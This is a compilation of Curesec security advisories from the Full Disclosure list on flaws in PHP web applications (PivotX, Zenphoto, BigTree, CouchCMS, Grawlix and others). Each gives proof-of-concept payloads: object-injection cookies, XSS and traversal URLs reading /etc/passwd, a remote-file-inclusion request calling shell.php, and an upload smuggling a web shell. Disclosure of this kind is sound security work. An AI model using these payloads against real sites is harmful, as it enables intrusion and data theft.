The impact of the vulnerability is difficult to estimate, as it may increase
with the existence of further modules. Without any modules installed, it can at
a minimum lead to DOS.
Proof of Concept:
GET /peel-shopping_8_0_2/achat/produit_details.php?id=1 HTTP/1.1
Host: localhost
Cookie: last_views=[INJECTED_OBJECT];
DOS Example: The Smarty_Internal_Configfileparser class can be used to create
an infinite loop.
GET /peel-shopping_8_0_2/achat/produit_details.php?id=1 HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Cookie: last_views=
%4f%3a%33%32%3a%22%53%6d%61%72%74%79%5f%49%6e%74%65%72%6e%61%6c%5f%43%6f%6e%66%69%67%66%69%6c%65%70%61%72%73%65%72%22%3a%33%3a%7b%73%3a%37%3a%22%79%79%73%74%61%63%6b%22%3b%4e%3b%73%3a%35%3a%22%79%79%69%64%78%22%3b%69%3a%31%3b%73%3a%31%31%3a%22%79%79%54%6f%6b%65%6e%4e%61%6d%65%22%3b%61%3a%30%3a%7b%7d%7d;
Connection: close
(Payload URL decoded:
O:32:"Smarty_Internal_Configfileparser":3:{s:7:"yystack";N;s:5:"yyidx";i:1;
s:11:"yyTokenName";a:0:{}})
4. Solution
To mitigate this issue please upgrade at least to version 8.0.3
Please note that a newer version might already be available.
5. Report Timeline
04/11/2016 Informed Vendor about Issue
04/12/2016 Vendor announces release of fix before 05/11/2016
09/14/2016 Disclosed to public
Blog Reference:
https://www.curesec.com/blog/article/blog/Peel-Shopping-802-Object-Injection-164.html
--
blog: https://www.curesec.com/blog
tweet: https://twitter.com/curesec
Curesec GmbH
Curesec Research Team
Josef-Orlopp-Straße 54
10365 Berlin, Germany
___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/
[FD] PivotX 2.3.11: Reflected XSS
Security Advisory - Curesec Research Team 1. Introduction Affected Product:PivotX 2.3.11 Fixed in:not fixed Fixed Version Link: n/a Vendor Website: http://pivotx.net/ Vulnerability Type: Reflected XSS Remote Exploitable: Yes Reported to vendor: 01/20/2016 Disclosed to public: 03/15/2016 Release mode:Full Disclosure CVE: n/a Credits Tim Coen of Curesec GmbH 2. Overview PivotX is a CMS for blogging written in PHP. In version 2.3.11, it is vulnerable to reflected XSS, allowing for the injection of JavaScript keyloggers or the bypassing of CSRF protection. In the case of PivotX, this may lead to code execution via other vulnerabilities in the same version in the admin area. 3. Details Description CVSS: Medium 4.3 AV:N/AC:M/Au:N/C:N/I:P/A:N The additionalpath parameter of the file explorer is vulnerable to reflected XSS. Proof of Concept http://localhost/pivotx_latest/pivotx/index.php?page=homeexplore&additionalpath =pivotalert(1) 4. Solution This issue was not fixed by the vendor. 5. Report Timeline 01/20/2016 Informed Vendor about Issue 01/29/2016 Vendor replies, PivotX is not maintained anymore 03/15/2016 Disclosed to public Blog Reference: https://blog.curesec.com/article/blog/PivotX-2311-Reflected-XSS-155.html -- blog: https://blog.curesec.com tweet: https://twitter.com/curesec Curesec GmbH Curesec Research Team Romain-Rolland-Str 14-24 13089 Berlin, Germany ___ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: http://seclists.org/fulldisclosure/
[FD] Zenphoto 1.4.11: RFI
Security Advisory - Curesec Research Team
1. Introduction
Affected Product: Zenphoto 1.4.11
Fixed in: 1.4.12
Fixed Version Link: https://github.com/zenphoto/zenphoto/archive/
zenphoto-1.4.12.zip
Vendor Website: http://www.zenphoto.org/
Vulnerability Type: RFI
Remote Exploitable: Yes
Reported to vendor: 01/29/2016
Disclosed to03/15/2016
public:
Release mode: Coordinated Release
CVE:n/a
Credits Tim Coen of Curesec GmbH
2. Overview
Zenphoto is a CMS for hosting images, written in PHP. In version 1.4.11, it is
vulnerable to remote file inclusion. An admin account is required.
3. Details
Description
CVSS: High 8.5 AV:N/AC:M/Au:S/C:C/I:C/A:C
When downloading a log file, the input is not properly sanitized, leading to
RFI.
An admin account is required, and allow_url_fopen must be set to true - which
is the default setting.
In old versions of PHP, this would additionally lead to LFI via null byte
poisoning or path expansion, regardless of allow_url_fopen settings.
Proof of Concept
GET /zenphoto-zenphoto-1.4.11/zp-core/admin-logs.php?action=download_log&page=
logs&tab=http://localhost/shell.php%3f%78%3d%69%64%26%66%6f%6f%3d&filename=
security&XSRFToken=afd5bafed21279d837486fd2beea81f87bc29dea HTTP/1.1
Code
// admin-logs.php (sanitize(x, 3) only strips out tags)
case 'download_log':
$zipname = sanitize($_GET['tab'], 3) . '.zip';
if (class_exists('ZipArchive')) {
$zip = new ZipArchive;
$zip->open($zipname, ZipArchive::CREATE);
$zip->addFile($file, basename($file));
$zip->close();
ob_get_clean();
header("Pragma: public");
header("Expires: 0");
header("Cache-Control: must-revalidate, post-check=0,
pre-check=0");
header("Cache-Control: private", false);
header("Content-Type: application/zip");
header("Content-Disposition: attachment; filename=" .
basename($zipname) . ";" );
header("Content-Transfer-Encoding: binary");
header("Content-Length: " . filesize($zipname));
readfile($zipname);
// remove zip file from temp path
unlink($zipname);
exit;
} else {
include_once(SERVERPATH . '/' . ZENFOLDER .
'/lib-zipStream.php');
$zip = new ZipStream($zipname);
$zip->add_file_from_path(internalToFilesystem(basename($file)),internalToFilesystem($file));
$zip->finish();
}
break;
4. Solution
To mitigate this issue please upgrade at least to version 1.4.12:
https://github.com/zenphoto/zenphoto/archive/zenphoto-1.4.12.zip
Please note that a newer version might already be available.
5. Report Timeline
01/29/2016 Informed Vendor about Issue
01/29/2016 Vendor replies
02/23/2016 Vendor sends fix for verification
02/23/2016 Suggested improvements for attempted fix
02/29/2016 Delayed Disclosure
03/14/2016 Vendor releases fix
03/15/2016 Disclosed to public
Blog Reference:
https://blog.curesec.com/article/blog/Zenphoto-1411-RFI-156.html
--
blog: https://blog.curesec.com
tweet: https://twitter.com/curesec
Curesec GmbH
Curesec Research Team
Romain-Rolland-Str 14-24
13089 Berlin, Germany
___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/
[FD] PivotX 2.3.11: Directory Traversal
Security Advisory - Curesec Research Team
1. Introduction
Affected Product:PivotX 2.3.11
Fixed in:not fixed
Fixed Version Link: n/a
Vendor Website: http://pivotx.net/
Vulnerability Type: Directory Traversal
Remote Exploitable: Yes
Reported to vendor: 01/20/2016
Disclosed to public: 03/15/2016
Release mode:Full Disclosure
CVE: n/a
Credits Tim Coen of Curesec GmbH
2. Overview
PivotX is a CMS for blogging written in PHP. In version 2.3.11, it is
vulnerable to Directory Traversal, allowing authenticated users to read and
delete files outside of the PivotX directory.
3. Details
Description
CVSS: Medium 4.0 AV:N/AC:L/Au:S/C:P/I:N/A:N
The function cleanPath which is responsible for sanitizing path names can be
bypassed by an attacker, leading to directory traversal in multiple places.
Proof of Concept
Admins and Superadmins can read any file:
http://localhost/pivotx_latest/pivotx/ajaxhelper.php?function=view&basedir=
L3Zhci93d3cvcGl2b3R4X2xhdGVzdC9CYXNlZGlyLwo=&file=.././/...//.//.../
/.//...//.//...//.//...//.//...//etc/passwd
Advanced users, Admins and Superadmins can delete any file, possibly leading to
DOS:
http://localhost/pivotx_latest/pivotx/index.php?page=media&del=.//.../
/.//...//.//...//.//...//.//...//.//...//important/
important.file&pivotxsession=ovyyn4ob2jc5ym92
Code
lib.php
function cleanPath($path) {
$path = str_replace('../', '', $path);
$path = str_replace('..\\', '', $path);
$path = str_replace('..'.DIRECTORY_SEPARATOR, '', $path);
return $path;
}
4. Solution
This issue was not fixed by the vendor.
5. Report Timeline
01/20/2016 Informed Vendor about Issue
01/29/2016 Vendor replies, PivotX is not maintained anymore
03/15/2016 Disclosed to public
Blog Reference:
https://blog.curesec.com/article/blog/PivotX-2311-Directory-Traversal-154.html
--
blog: https://blog.curesec.com
tweet: https://twitter.com/curesec
Curesec GmbH
Curesec Research Team
Romain-Rolland-Str 14-24
13089 Berlin, Germany
___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/
[FD] BigTree 4.2.8: Object Injection & Improper Filename Sanitation
Security Advisory - Curesec Research Team
1. Introduction
Affected Product:BigTree 4.2.8
Fixed in:BigTree 4.2.9
Fixed Version Link: https://www.bigtreecms.org/download/
Vendor Website: https://www.bigtreecms.org/
Vulnerability Type: Object Injection & Improper Filename Sanitation
Remote Exploitable: Yes
Reported to vendor: 01/29/2016
Disclosed to public: 03/15/2016
Release mode:Coordinated Release
CVE: n/a
Credits Tim Coen of Curesec GmbH
2. Overview
BigTree CMS is a CMS written in PHP. In version 4.2.8, it is vulnerable to
object injection. The impact of this vulnerability is currently small -
privileged users can update settings they are not allowed to update - but may
be more extensive depending on installed plugins.
In addition to the object injection, BigTree also has a function called
cleanFile which is supposed to prevent directory traversal, but which can be
bypassed. The function is not currently used by BigTree itself, but may be used
by plugins.
3. Object Injection
Description
CVSS: Low 3.5 AV:N/AC:M/Au:S/C:N/I:P/A:N
BigTree passes unvalidated user input to unserialize, leading to PHP object
injection. The vulnerability is in the backend, so a user account with the role
developer or admin is required. A successful exploitation may for example lead
to an admin editing settings they are not authorized to edit.
In BigTree, the admin role is less privileged than the developer role. For
example, an admin can only edit a subset of the settings.
The impact of the vulnerability is currently small, as BigTree does not
implement __wakeup in any classes, none of the classes implement the iterator
interface, and __destruct is only implemented in a limited number of classes,
and only one of the cases seems relevant to security: The destructor of the
BigTreeCMSBase class updates all settings, without again validating if the user
is allowed to update the setting and without re-validating the value of a
setting.
This may for example lead to persistent XSS - the admin does not have the right
to post scripts, as this would weaken the distinction between admins and
developers - by changing the colophon setting. An admin has the right to edit
this setting, but the input is HTML encoded before putting it in the database.
By bypassing this encoding, a malicious admin can inject scripts.
It should be noted that custom modules may contain classes that lead to a
bigger security impact of this vulnerability.
Proof of Concept
The attack can be achieved in a browser by visiting the following URL and
clicking on save:
http://localhost/BigTree-CMS/site/index.php/admin/trees/edit/2/?view_data=
[INJECTED OBJECT]
A payload to update the setting "bigtree-internal-security-policy" may for
example be:
a:2:{s:7:"bigtree";O:14:"BigTreeCMSBase":2:{s:16:"AutoSaveSettings";a:1:
{s:32:"bigtree-internal-security-policy";a:1:{s:3:"foo";s:3:"bar";}}
s:15:"ModuleClassList";a:2:{s:9:"DemoTrees";s:5:"trees";s:10:"DemoQuotes";
s:6:"quotes";}}s:4:"view";s:6:"foobar";}
The actual request is a POST request to /BigTree-CMS/site/index.php/admin/trees
/edit/process/, where the _bigtree_return_view_data field contains the base64
encoded payload.
Code
/process.php
$return_view_data =
unserialize(base64_decode($_POST["_bigtree_return_view_data"]));
if (!$bigtree["form"]["return_view"] || $bigtree["form"]["return_view"] ==
$return_view_data["view"]) {
$redirect_append = array();
unset($return_view_data["view"]); // We don't need the view passed
back.
foreach ($return_view_data as $key => $val) {
$redirect_append[] = "$key=".urlencode($val);
}
$redirect_append = "?".implode("&",$redirect_append);
}
/cms.php
function __destruct() {
foreach ($this->AutoSaveSettings as $id => $obj) {
if (is_object($obj)) {
BigTreeAdmin::updateSettingValue($id,get_object_vars($obj));
} else {
BigTreeAdmin::updateSettingValue($id,$obj);
}
}
}
4. Improper Filename Sanitation
Description
The function cleanFile is supposed to prevent directory traversal, but
currently it does not fulfill its task, as an attacker can easily bypass the
filter via //. The function is currently not used for any sensitive tasks,
but it may be used by extensions or in the future.
Code
/*
Function: cleanFile
Makes sure that a file path doesn't contain abusive characters
(i.e. ../)
Parameters:
file - A file name
Returns:
Cleaned up string.
*/
static function cleanFile($file) {
return str_replace("../","",$file);
}
5. Solution
To mitigate this issue please upgrade at least to version 4.2.9:
https://www.bigtreecms.org/download/
Please note that a newer version might already be available.
[FD] PivotX 2.3.11: Code Execution
Security Advisory - Curesec Research Team 1. Introduction Affected Product:PivotX 2.3.11 Fixed in:not fixed Fixed Version Link: n/a Vendor Website: http://pivotx.net/ Vulnerability Type: Code Execution Remote Exploitable: Yes Reported to vendor: 01/20/2016 Disclosed to public: 03/15/2016 Release mode:Full Disclosure CVE: n/a Credits Tim Coen of Curesec GmbH 2. Overview PivotX is a CMS for blogging written in PHP. In version 2.3.11, it is vulnerable to code execution by authenticated users because it does not check the extension of files when renaming them. 3. Details Description CVSS: High 9.0 AV:N/AC:L/Au:S/C:C/I:C/A:C The file upload functionality checks file extensions when uploading files to prevent the uploading of malicious files such as PHP files. However, the rename function does not check the extension of the new filename, leading to code execution. An account in the advanced users, admins, or superadmins role is required to upload files. Proof of Concept 1. Upload an image file containing PHP code with a valid extension such as png 2. rename it so it has a PHP extension: http://localhost/pivotx_latest/pivotx/ index.php?page=media&file=imageshell.png&pivotxsession=ovyyn4ob2jc5ym92&answer= shell.php 4. Solution This issue was not fixed by the vendor. 5. Report Timeline 01/20/2016 Informed Vendor about Issue 01/29/2016 Vendor replies, PivotX is not maintained anymore 03/15/2016 Disclosed to public Blog Reference: https://blog.curesec.com/article/blog/PivotX-2311-Code-Execution-153.html -- blog: https://blog.curesec.com tweet: https://twitter.com/curesec Curesec GmbH Curesec Research Team Romain-Rolland-Str 14-24 13089 Berlin, Germany ___ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: http://seclists.org/fulldisclosure/
[FD] Opendocman 1.3.4: HTML Injection
Security Advisory - Curesec Research Team 1. Introduction Affected Product:Opendocman 1.3.4 Fixed in:1.3.5 Fixed Version Link: http://www.opendocman.com/free-download/ Vendor Website: http://www.opendocman.com/ Vulnerability Type: HTML Injection Remote Exploitable: Yes Reported to vendor: 11/21/2015 Disclosed to public: 02/01/2016 Release mode:Coordinated Release CVE: n/a Credits Tim Coen of Curesec GmbH 2. Overview CVSS Medium 4.3 AV:N/AC:M/Au:N/C:N/I:P/A:N Description To defend against XSS and similar attacks, opendocman depends on a function that filters all input to remove dangerous tags and attributes. The filter does filter out all simple approaches to XSS, but it still leaves an attacker with large control over the look and functionality of the website. This can lead to phishing attacks, privilege escalation, defacement, and may lead to XSS with older browsers. There are likely other possibilities for attackers. It is recommended to HTML-encode user input before echoing it to mitigate these issues, instead of relying on input filtering. These issues are present across the application and are reflected as well as persistent, for example via the profile or comments. 3. Proof of Concept Privilege Escalation A registered user can exploit this issue in combination with social engineering to gain admin rights: - Change any profile field, such as last name, to: Smith">http://localhost/opendocman-1.3.4/search.php/";> Phishing & Defacement Attacker-controlled elements can be shown in places where a user would only expect application-controlled data, not user data, which can be used in phishing attacks or to deface the website. A simple example would be: http://localhost/opendocman-1.3.4/search.php/";>http://evil.com"; style= "background: red; color: white">Security Alert: Please upgrade to the latest version here!http://localhost/opendocman-1.3.4/add.php The same is possible when updating a user profile here: http://localhost/opendocman-1.3.4//profile.php It should be noted that by default, the registration is not open, but there is an option to open registration for anyone. 4. Code The problem exists across the application. A quick search reveals at least these code snippets which are likely open to reflected attacks. Further parameters are likely vulnerable as well. Additionally, all user input that is persisted seems to be affected as well. check-out.php:'; category.php: rejects.php:echo ''; rejects.php:echo ''; search.php:http://www.opendocman.com/free-download/ Please note that a newer version might already be available. 6. Report Timeline 11/21/2015 Informed Vendor about Issue (no reply) 12/10/2015 Reminded Vendor of disclosure date 12/19/2015 Vendor sends fix for different issue for verification 01/13/2016 Confirmed fix 01/20/2016 Vendor requests more time to fix XSS issues 01/31/2016 Vendor releases fix 02/01/2015 Disclosed to public Blog Reference: https://blog.curesec.com/article/blog/Opendocman-134-HTML-Injection-151.html -- blog: https://blog.curesec.com tweet: https://twitter.com/curesec Curesec GmbH Curesec Research Team Romain-Rolland-Str 14-24 13089 Berlin, Germany ___ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: http://seclists.org/fulldisclosure/
[FD] Opendocman 1.3.4: CSRF
Security Advisory - Curesec Research Team 1. Introduction Affected Product:Opendocman 1.3.4 Fixed in:1.3.5 Fixed Version Link: http://www.opendocman.com/free-download/ Vendor Website: http://www.opendocman.com/ Vulnerability Type: CSRF Remote Exploitable: Yes Reported to vendor: 11/21/2015 Disclosed to public: 02/01/2016 Release mode:Coordinated Release CVE: n/a Credits Tim Coen of Curesec GmbH 2. Overview CVSS Medium 5.1 AV:N/AC:H/Au:N/C:P/I:P/A:P Description Opendocman does not have CSRF protection, which means that an attacker can perform actions for an admin, if the admin visits an attacker controlled website while logged in. 3. Proof of Concept Add new Admin User: http://localhost/opendocman-1.3.4/user.php"; method="POST" enctype="multipart/form-data"> 4. Solution To mitigate this issue please upgrade at least to version 1.3.5: http://www.opendocman.com/free-download/ Please note that a newer version might already be available. 5. Report Timeline 11/21/2015 Informed Vendor about Issue (no reply) 12/10/2015 Reminded Vendor of disclosure date 12/19/2015 Vendor sends fix for CSRF for verification 01/13/2016 Confirmed CSRF fix 01/20/2016 Vendor requests more time to fix other issues in same version 01/31/2016 Vendor releases fix 02/01/2015 Disclosed to public Blog Reference: https://blog.curesec.com/article/blog/Opendocman-134-CSRF-150.html -- blog: https://blog.curesec.com tweet: https://twitter.com/curesec Curesec GmbH Curesec Research Team Romain-Rolland-Str 14-24 13089 Berlin, Germany ___ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: http://seclists.org/fulldisclosure/
[FD] Atutor 2.2: XSS
Security Advisory - Curesec Research Team 1. Introduction Affected Product:Atutor 2.2 Fixed in:partly in ATutor 2.2.1-RC1, complete in 2.2.1 Fixed Version Link: http://www.atutor.ca/atutor/download.php Vendor Website: http://www.atutor.ca/ Vulnerability Type: XSS Remote Exploitable: Yes Reported to vendor: 11/17/2015 Disclosed to public: 02/01/2016 Release mode:Coordinated Release CVE: n/a Credits Tim Coen of Curesec GmbH 2. Overview Atutor is a learning management system (LMS) written in PHP. In version 2.2, it is vulnerable to multiple reflected and persistent XSS attacks. The vulnerabilities can lead to the stealing of cookies, injection of keyloggers, or the bypassing of CSRF protection. If the victim is an admin, a successful exploitation can lead to code execution via the theme uploader, and if the victim is an instructor, this can lead to code execution via a file upload vulnerability in the same version of Atutor. 3. Details XSS 1: Reflected XSS - Calendar CVSS: Medium 4.3 AV:N/AC:M/Au:N/C:N/I:P/A:N Description: The calendar_next parameter of the calendar is vulnerable to XSS. This issue has been fixed in ATutor 2.2.1-RC1. Proof of Concept: http://localhost/ATutor/mods/_standard/calendar/getlanguage.php?token=calendar_next
[FD] esoTalk 1.0.0g4: XSS
Security Advisory - Curesec Research Team 1. Introduction Affected Product:esoTalk 1.0.0g4 Fixed in:not fixed Fixed Version Link: n/a Vendor Contact: t...@esotalk.org Vulnerability Type: XSS Remote Exploitable: Yes Reported to vendor: 11/17/2015 Disclosed to public: 12/21/2015 Release mode:Full Disclosure CVE: n/a Credits Tim Coen of Curesec GmbH 2. Overview CVSS Medium 4.3 AV:N/AC:M/Au:N/C:N/I:P/A:N Description esoTalk is a light-weight forum software written in PHP. In version 1.0.0g4 and possibly prior versions, there is a reflected XSS vulnerability in the search because a given URL is echoed unencoded in multiple places. Successful exploitation may lead to the injection of JavaScript keyloggers, the stealing of cookies, or the bypassing of CSRF protection. 3. Proof of Concept http://localhost/esoTalk-1.0.0g4/conversations/a'">?search=test 4. Solution This issue was not fixed by the vendor. 5. Report Timeline 11/17/2015 Informed Vendor about Issue (no reply) 12/10/2015 Reminded Vendor of Disclosure Date (no reply) 12/21/2015 Disclosed to public Blog Reference: https://blog.curesec.com/article/blog/esoTalk-100g4-XSS-124.html -- blog: https://blog.curesec.com tweet: https://twitter.com/curesec Curesec GmbH Curesec Research Team Romain-Rolland-Str 14-24 13089 Berlin, Germany ___ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: http://seclists.org/fulldisclosure/
[FD] CouchCMS 1.4.5: Code Execution
Security Advisory - Curesec Research Team 1. Introduction Affected Product:CouchCMS 1.4.5 Fixed in:1.4.7 Fixed Version Link: http://www.couchcms.com/products/ Vendor Website: http://www.couchcms.com/ Vulnerability Type: Code Execution Remote Exploitable: Yes Reported to vendor: 11/17/2015 Disclosed to public: 12/21/2015 Release mode:Coordinated Release CVE: n/a Credits Tim Coen of Curesec GmbH 2. Overview CVSS High 8.5 AV:N/AC:M/Au:S/C:C/I:C/A:C Description When uploading a file, the file extension is checked against a blacklist. This blacklist misses at the least pht, which is executed by most default Apache configurations. The uploaded file must be a valid image file, but an attacker can bypass this restriction. Admin credentials are required to upload files. A htaccess file forbids the execution of PHP code in uploaded files, but some servers are configured to not read htaccess files, for example for performance reasons. Apache for example ignores htaccess files by default since version 2.3.9. 3. Proof of Concept POST /CouchCMS-1.4.5/couch/includes/kcfinder/browse.php?type=image&lng=en&act=upload&nonce=1abb096565d868f94f727f600e8c4f61 HTTP/1.1 Host: localhost Connection: keep-alive Content-Type: multipart/form-data; boundary=---18851501621445926637695954351 Content-Length: 529 -18851501621445926637695954351 Content-Disposition: form-data; name="upload[]"; filename="imageshell.pht" Content-Type: application/octet-stream [base64: iVBORw0KGgoNSUhEUgAAACAgCAIAAAD8GO2jCXBIWXMAAA7EAAAOxAGVKw4bYElEQVRIiWNcPD89JF9HRVRbMF0oJF9QT1NUWzFdKTs/PliAgYHBc143k/yPi9t+X9N9qif38ePJv1/vBnyyMDBj2bln/dk9G84yjIJRMApGwSgYBaNgFIyCUTAKhg0AAIGyGwIHeA0MAElFTkSuQmCC] The shellcode used can be found here: https://www.idontplaydarts.com/2012/06/ encoding-web-shells-in-png-idat-chunks/ 4. Solution To mitigate this issue please upgrade at least to version 1.4.7: http://www.couchcms.com/products/ Please note that a newer version might already be available. 5. Report Timeline 11/17/2015 Informed Vendor about Issue 11/18/2015 Vendor sends fixes for confirmation 11/20/2015 Verified fixes 11/24/2015 Vendor releases fix 12/21/2015 Disclosed to public Blog Reference: https://blog.curesec.com/article/blog/CouchCMS-145-Code-Execution-125.html -- blog: https://blog.curesec.com tweet: https://twitter.com/curesec Curesec GmbH Curesec Research Team Romain-Rolland-Str 14-24 13089 Berlin, Germany ___ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: http://seclists.org/fulldisclosure/
[FD] Grawlix 1.0.3: CSRF
Security Advisory - Curesec Research Team 1. Introduction Affected Product:Grawlix 1.0.3 Fixed in:not fixed Fixed Version Link: n/a Vendor Website: http://www.getgrawlix.com/ Vulnerability Type: CSRF Remote Exploitable: Yes Reported to vendor: 11/17/2015 Disclosed to public: 12/21/2015 Release mode:Full Disclosure CVE: n/a Credits Tim Coen of Curesec GmbH 2. Overview CVSS Medium 5.1 AV:N/AC:H/Au:N/C:P/I:P/A:P Description Grawlix is a CMS for publishing comics, which is written in PHP. In version 1.0.3, it does not have CSRF protection, which means that an attacker can perform actions for a victim, if the victim visits an attacker controlled site while logged in. An attacker can for example change the password of an existing admin account, which may in turn lead to code execution via a different vulnerability in the admin area. 3. Proof of Concept Change admin password: http://localhost/grawlix-1.0.3/grawlix-1.0.3/_admin/user.config.php"; method="POST"> 4. Solution This issue was not fixed by the vendor. 5. Report Timeline 11/17/2015 Informed Vendor about Issue (no reply) 12/10/2015 Reminded Vendor of Disclosure Date (no reply) 12/21/2015 Disclosed to public Blog Reference: https://blog.curesec.com/article/blog/Grawlix-103-CSRF-128.html -- blog: https://blog.curesec.com tweet: https://twitter.com/curesec Curesec GmbH Curesec Research Team Romain-Rolland-Str 14-24 13089 Berlin, Germany ___ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: http://seclists.org/fulldisclosure/
[FD] CouchCMS 1.4.5: XSS & Open Redirect
Security Advisory - Curesec Research Team
1. Introduction
Affected Product:CouchCMS 1.4.5
Fixed in:1.4.7
Fixed Version Link: http://www.couchcms.com/products/
Vendor Website: http://www.couchcms.com/
Vulnerability Type: XSS & Open Redirect
Remote Exploitable: Yes
Reported to vendor: 11/17/2015
Disclosed to public: 12/21/2015
Release mode:Coordinated Release
CVE: n/a
Credits Tim Coen of Curesec GmbH
2. Overview
CVSS
Medium 4.3 AV:N/AC:M/Au:N/C:N/I:P/A:N
Description
CouchCMS 1.4.5 contains two reflected XSS and one open redirect vulnerability.
Successful exploitation may lead to the injection of JavaScript keyloggers, the
stealing of cookies, or the bypassing of CSRF protection.
3. Details
XSS 1
When displaying a post, the name of any additional GET parameters is echoed
unencoded, leading to XSS.
Proof of Concept:
http://localhost/CouchCMS-1.4.5/blog.php?p=5&foo";>alert(2)bar=1
Code:
function getPaginationString( $page = 1, $totalitems, $limit = 15, $adjacents =
1, $targetpage = "/", $pagestring = "?page=", $prev_text, $next_text, $simple ){
[...]
$pagination .= "$counter";\
[...]
$pagination .= "$counter";
[...]
$pagination .= "$lpm1";
$pagination .= "$lastpage";
[... (all $targetpage . $pagestring are affected) ...]
}
XSS 2
When displaying comments, the name of any additional GET parameters is echoed
unencoded, leading to XSS.
Proof of Concept:
http://localhost/CouchCMS-1.4.5/couch/?o=comments&foo";>alert(1)bar=1
Code:
/couch/edit-comments.php
href="">t('all'); ?> |
href="&status=0">t('unapproved'); ?> |
href="&status=1">t('approved'); ?>
(of '.$page_title.')';
}
?>
[...]
|
t('view'); ?> |
t('edit'); ?> |
t('delete'); ?>
Open Redirect
The filter which checks if a user supplied redirect value leads to external
pages can be bypassed by an attacker.
Proof of Concept (Only works for logged in victims or after login):
http://localhost/CouchCMS-1.4.5/couch/login.php?redirect=//google.com
Code:
/couch/auth/auth.php
function redirect( $dest ){
global $FUNCS, $DB;
// sanity checks
$dest = $FUNCS->sanitize_url( trim($dest) );
if( !strlen($dest) ){
$dest = ( $this->user->access_level < K_ACCESS_LEVEL_ADMIN ) ? K_SITE_URL :
K_ADMIN_URL . K_ADMIN_PAGE;
}
elseif( strpos(strtolower($dest), 'http')===0 ){
if( strpos($dest, K_SITE_URL)!==0 ){ // we don't allow redirects external to
our site
$dest = K_SITE_URL;
}
}
$DB->commit( 1 );
header( "Location: ".$dest );
die();
}
4. Solution
To mitigate this issue please upgrade at least to version 1.4.7:
http://www.couchcms.com/products/
Please note that a newer version might already be available.
5. Report Timeline
11/17/2015 Informed Vendor about Issue
11/18/2015 Vendor sends fixes for confirmation
11/20/2015 Verified fixes
11/24/2015 Vendor releases fix
12/21/2015 Disclosed to public
Blog Reference:
https://blog.curesec.com/article/blog/CouchCMS-145-XSS-amp-Open-Redirect-126.html
--
blog: https://blog.curesec.com
tweet: https://twitter.com/curesec
Curesec GmbH
Curesec Research Team
Romain-Rolland-Str 14-24
13089 Berlin, Germany
___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/
[FD] Grawlix 1.0.3: XSS
Security Advisory - Curesec Research Team
1. Introduction
Affected Product:Grawlix 1.0.3
Fixed in:not fixed
Fixed Version Link: n/a
Vendor Website: http://www.getgrawlix.com/
Vulnerability Type: XSS
Remote Exploitable: Yes
Reported to vendor: 11/17/2015
Disclosed to public: 12/21/2015
Release mode:Full Disclosure
CVE: n/a
Credits Tim Coen of Curesec GmbH
2. Overview
CVSS
Medium 4.3 AV:N/AC:M/Au:N/C:N/I:P/A:N
Description
Grawlix is a CMS for publishing comics, which is written in PHP. In version
1.0.3 and possibly prior versions, it contains multiple reflected XSS
vulnerabilities.
Successful exploitation may lead to the injection of JavaScript keyloggers, the
stealing of cookies, or the bypassing of CSRF protection.
3. Details
XSS 1
When searching for a book in the admin area, the keyword parameter is echoed
unencoded inside the value attribute of an input tag, leading to XSS.
Proof of Concept:
http://localhost/grawlix-1.0.3/_admin/book.view.php?keyword="; autofocus
onfocus="alert(1)
Code:
_admin/book.view.php
XSS 2
The slot.label-set.ajax.php script echoes all GET parameters unencoded, leading
to XSS.
Proof of Concept:
http://localhost/grawlix-1.0.3/_admin/slot.label-set.ajax.php?x=alert(1)
Code:
_admin/slot.label-set.ajax.php
echo '$_GET|';print_r($_GET);echo '|';
XSS 3
The edit_id parameter of the site.nav-edit.ajax.php is vulnerable to XSS.
Proof of Concept:
http://localhost/grawlix-1.0.3/_admin/site.nav-edit.ajax.php?edit_id=";>alert(1)
Code:
_admin/site.nav-edit.ajax.php
$edit_id = $_GET['edit_id'];
[...]
$modal->value($edit_id);
_admin/lib/GrlxForm.php
$this->value ? $value = ' value="'.$this->value.'"' : null;
XSS 4
When viewing the book overview, the start_sort_order parameter is vulnerable to
XSS.
Proof of Concept:
http://localhost/grawlix-1.0.3/_admin/book.view.php?delete_page_id=1&start_sort_order=";
onmouseover="alert(1)
Code:
_admin/book.view.php
$delete_link->query("delete_page_id=$val[id]&start_sort_order=$start_sort_order");
XSS 5 (limited)
In two scripts, the page_id value is put into a hidden input element without
encoding quotes. It may be possible to execute JavaScript via a style element
in older browsers.
Proof of Concept:
http://localhost/grawlix-1.0.3/_admin/sttc.xml-edit.php?msg=created&page_id=";
style="STYLE
http://localhost/grawlix-1.0.3/_admin/book.page-edit.php?page_id="; style="STYLE
4. Solution
This issue was not fixed by the vendor.
5. Report Timeline
11/17/2015 Informed Vendor about Issue (no reply)
12/10/2015 Reminded Vendor of Disclosure Date (no reply)
12/21/2015 Disclosed to public
Blog Reference:
https://blog.curesec.com/article/blog/Grawlix-103-XSS-129.html
--
blog: https://blog.curesec.com
tweet: https://twitter.com/curesec
Curesec GmbH
Curesec Research Team
Romain-Rolland-Str 14-24
13089 Berlin, Germany
___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/
[FD] Grawlix 1.0.3: Code Execution
Security Advisory - Curesec Research Team
1. Introduction
Affected Product:Grawlix 1.0.3
Fixed in:not fixed
Fixed Version Link: n/a
Vendor Website: http://www.getgrawlix.com/
Vulnerability Type: Code Execution
